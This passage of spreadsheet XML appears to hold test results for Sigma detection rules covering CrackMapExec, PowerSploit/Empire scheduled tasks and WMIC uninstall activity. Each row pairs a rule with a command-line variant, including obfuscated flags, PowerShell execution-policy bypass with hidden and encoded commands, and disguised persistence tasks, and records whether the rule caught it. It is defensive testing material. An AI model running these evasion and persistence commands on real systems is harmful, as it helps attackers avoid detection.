          <t>proc_creation_win_wmic_uninstall_application</t>
        </is>
      </c>
      <c r="C1413" s="44" t="inlineStr">
        <is>
          <t>Application Removed Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1413" s="44" t="inlineStr">
        <is>
          <t>b53317a0-8acf-4fd1-8de8-a5401e776b96</t>
        </is>
      </c>
      <c r="E1413" s="44" t="inlineStr">
        <is>
          <t>regsvr32 -s /"u" C:\Path\To\Uninstall.dll</t>
        </is>
      </c>
      <c r="F1413" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1413" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1413" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1413" s="44" t="inlineStr">
        <is>
          <t>Regsvr32 Execution From Highly Suspicious Location (327ff235-94eb-4f06-b9de-aaee571324be); Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J1413" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1413" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1414" ht="15.75" customHeight="1" s="42">
      <c r="A1414" s="43" t="n"/>
      <c r="B1414" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_uninstall_application</t>
        </is>
      </c>
      <c r="C1414" s="44" t="inlineStr">
        <is>
          <t>Application Removed Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1414" s="44" t="inlineStr">
        <is>
          <t>b53317a0-8acf-4fd1-8de8-a5401e776b96</t>
        </is>
      </c>
      <c r="E1414" s="44" t="inlineStr">
        <is>
          <t>regsvr32 /"s" /u C:\Path\To\Uninstall.dll</t>
        </is>
      </c>
      <c r="F1414" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1414" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1414" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1414" s="43" t="inlineStr">
        <is>
          <t>Regsvr32 Execution From Highly Suspicious Location (327ff235-94eb-4f06-b9de-aaee571324be); Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J1414" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1414" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1415" ht="15.75" customHeight="1" s="42">
      <c r="A1415" s="43" t="n"/>
      <c r="B1415" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C1415" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D1415" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E1415" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C 2&gt;&amp;1 1&gt; \\127.0.0.1\C$\Temp\output.txt whoami</t>
        </is>
      </c>
      <c r="F1415" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1415" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1415" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1415" s="43" t="n"/>
      <c r="J1415" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1415" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1416" ht="15.75" customHeight="1" s="42">
      <c r="A1416" s="43" t="n"/>
      <c r="B1416" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C1416" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D1416" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E1416" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c 2&gt;&amp;1 1&gt; \\127.0.0.1\C$\Temp\output.txt whoami</t>
        </is>
      </c>
      <c r="F1416" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1416" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1416" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1416" s="43" t="n"/>
      <c r="J1416" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1416" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1417" ht="15.75" customHeight="1" s="42">
      <c r="A1417" s="43" t="n"/>
      <c r="B1417" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C1417" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D1417" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E1417" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"C" 2&gt;&amp;1 1&gt; \\127.0.0.1\C$\Temp\output.txt whoami</t>
        </is>
      </c>
      <c r="F1417" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1417" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1417" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1417" s="43" t="n"/>
      <c r="J1417" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1417" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1418" ht="15.75" customHeight="1" s="42">
      <c r="A1418" s="43" t="n"/>
      <c r="B1418" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C1418" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D1418" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E1418" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nop -noni -w 1 -exec bypass -c "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F1418" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1418" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1418" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1418" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1418" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1418" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1419" ht="15.75" customHeight="1" s="42">
      <c r="A1419" s="43" t="n"/>
      <c r="B1419" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C1419" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D1419" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E1419" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NOp -noni -w 1 -exec bypass -Command "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F1419" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1419" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1419" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1419" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1419" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1419" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1420" ht="15.75" customHeight="1" s="42">
      <c r="A1420" s="43" t="n"/>
      <c r="B1420" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C1420" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D1420" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E1420" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NOP -noni -W 1 -exec bypass -c "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F1420" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1420" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1420" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1420" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1420" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1420" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1421" ht="15.75" customHeight="1" s="42">
      <c r="A1421" s="43" t="n"/>
      <c r="B1421" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C1421" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D1421" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E1421" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F1421" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1421" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1421" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1421" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1421" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1421" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1422" ht="15.75" customHeight="1" s="42">
      <c r="A1422" s="43" t="n"/>
      <c r="B1422" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C1422" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D1422" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E1422" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAIABDAHQAZQB...</t>
        </is>
      </c>
      <c r="F1422" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1422" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1422" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1422" s="4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J1422" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1422" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1423" ht="15.75" customHeight="1" s="42">
      <c r="A1423" s="44" t="n"/>
      <c r="B1423" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C1423" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D1423" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E1423" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C "whoami" &gt; C:\Users\Public\output.txt 2&gt; nul</t>
        </is>
      </c>
      <c r="F1423" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1423" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1423" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1423" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious CMD Shell Output Redirect (8e0bb260-d4b2-4fff-bb8d-3f82118e6892); Whoami.EXE Execution With Output Option (c30fb093-1109-4dc8-88a8-b30d11c95a5d)</t>
        </is>
      </c>
      <c r="J1423" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1423" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1424" ht="15.75" customHeight="1" s="42">
      <c r="A1424" s="44" t="n"/>
      <c r="B1424" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C1424" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D1424" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E1424" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"C" "whoami" &gt; C:\Users\Public\output.txt 2&gt; nul</t>
        </is>
      </c>
      <c r="F1424" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1424" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1424" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1424" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious CMD Shell Output Redirect (8e0bb260-d4b2-4fff-bb8d-3f82118e6892); Whoami.EXE Execution With Output Option (c30fb093-1109-4dc8-88a8-b30d11c95a5d)</t>
        </is>
      </c>
      <c r="J1424" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1424" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1425" ht="15.75" customHeight="1" s="42">
      <c r="A1425" s="44" t="n"/>
      <c r="B1425" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C1425" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D1425" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E1425" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"C" "whoami" &gt; C:\Users\Public\output.txt 2&gt; nul</t>
        </is>
      </c>
      <c r="F1425" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1425" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1425" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1425" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious CMD Shell Output Redirect (8e0bb260-d4b2-4fff-bb8d-3f82118e6892); Whoami.EXE Execution With Output Option (c30fb093-1109-4dc8-88a8-b30d11c95a5d)</t>
        </is>
      </c>
      <c r="J1425" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1425" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1426" ht="15.75" customHeight="1" s="42">
      <c r="A1426" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1426" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1426" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1426" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1426" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN EvilTask /TR "C:\Windows\System32\calc.exe" /SC WEEKLY /D MON /ST 08:00</t>
        </is>
      </c>
      <c r="F1426" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1426" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1426" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1426" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1426" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1426" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1427" ht="15.75" customHeight="1" s="42">
      <c r="A1427" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1427" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1427" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1427" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1427" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /CReatE -"TN" EvilTask /TR "C:\Windows\System32\calc.exe" /sc WEEKLY -"D" MON -"ST" 08:00</t>
        </is>
      </c>
      <c r="F1427" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1427" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1427" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1427" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1427" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1427" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1428" ht="15.75" customHeight="1" s="42">
      <c r="A1428" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1428" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1428" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1428" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1428" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /cReatE /TN EvilTask /TR "C:\Windows\System32\calc.exe" -"SC" WEEKLY /D MON -"ST" 08:00</t>
        </is>
      </c>
      <c r="F1428" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1428" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1428" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1428" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1428" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1428" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1429" ht="15.75" customHeight="1" s="42">
      <c r="A1429" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1429" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1429" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1429" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1429" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN EvilTask /TR "C:\Windows\System32\calc.exe" /SC WEEKLY /D MON /"ST" 08:00</t>
        </is>
      </c>
      <c r="F1429" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1429" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1429" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1429" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1429" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1429" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1430" ht="15.75" customHeight="1" s="42">
      <c r="A1430" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1430" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1430" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1430" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1430" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" /TN EvilTask /"TR" "C:\Windows\System32\calc.exe" /sc WEEKLY /d MON /ST 08:00</t>
        </is>
      </c>
      <c r="F1430" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1430" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1430" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1430" s="43" t="n"/>
      <c r="J1430" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1430" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1431" ht="15.75" customHeight="1" s="42">
      <c r="A1431" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1431" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1431" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1431" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1431" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" /"TN" EvilTask /TR "C:\Windows\System32\calc.exe" /SC WEEKLY /d MON /"ST" 08:00</t>
        </is>
      </c>
      <c r="F1431" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1431" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1431" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1431" s="43" t="n"/>
      <c r="J1431" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1431" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1432" ht="15.75" customHeight="1" s="42">
      <c r="A1432" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1432" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1432" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1432" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1432" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" -"TN" EvilTask /tR "C:\Windows\System32\calc.exe" -"SC" WEEKLY /D MON /st 08:00</t>
        </is>
      </c>
      <c r="F1432" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1432" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1432" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1432" s="44" t="n"/>
      <c r="J1432" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1432" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1433" ht="15.75" customHeight="1" s="42">
      <c r="A1433" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1433" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1433" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1433" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1433" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /CREaTe /TN EvilTask -"TR" "C:\Windows\System32\calc.exe" /"SC" WEEKLY -"D" MON /ST 08:00</t>
        </is>
      </c>
      <c r="F1433" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1433" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1433" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1433" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1433" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1433" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1434" ht="15.75" customHeight="1" s="42">
      <c r="A1434" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1434" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1434" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1434" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1434" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" /tN EvilTask -"TR" "C:\Windows\System32\calc.exe" -"SC" WEEKLY /D MON -"ST" 08:00</t>
        </is>
      </c>
      <c r="F1434" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1434" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1434" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1434" s="44" t="n"/>
      <c r="J1434" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1434" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1435" ht="15.75" customHeight="1" s="42">
      <c r="A1435" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1435" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1435" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1435" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1435" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /crEaTE /"TN" EvilTask /TR "C:\Windows\System32\calc.exe" -"SC" WEEKLY /D MON /"ST" 08:00</t>
        </is>
      </c>
      <c r="F1435" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1435" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1435" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1435" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1435" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1435" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1436" ht="15.75" customHeight="1" s="42">
      <c r="A1436" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1436" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1436" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1436" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1436" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" -"TN" EvilTask /tR "C:\Windows\System32\calc.exe" /SC WEEKLY /D MON /st 08:00</t>
        </is>
      </c>
      <c r="F1436" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1436" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1436" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1436" s="44" t="n"/>
      <c r="J1436" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1436" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1437" ht="15.75" customHeight="1" s="42">
      <c r="A1437" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1437" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1437" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1437" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1437" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN "WinUpdateTask" /TR "powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command \"Write-Host 'Test'\"" /SC ONLOGON</t>
        </is>
      </c>
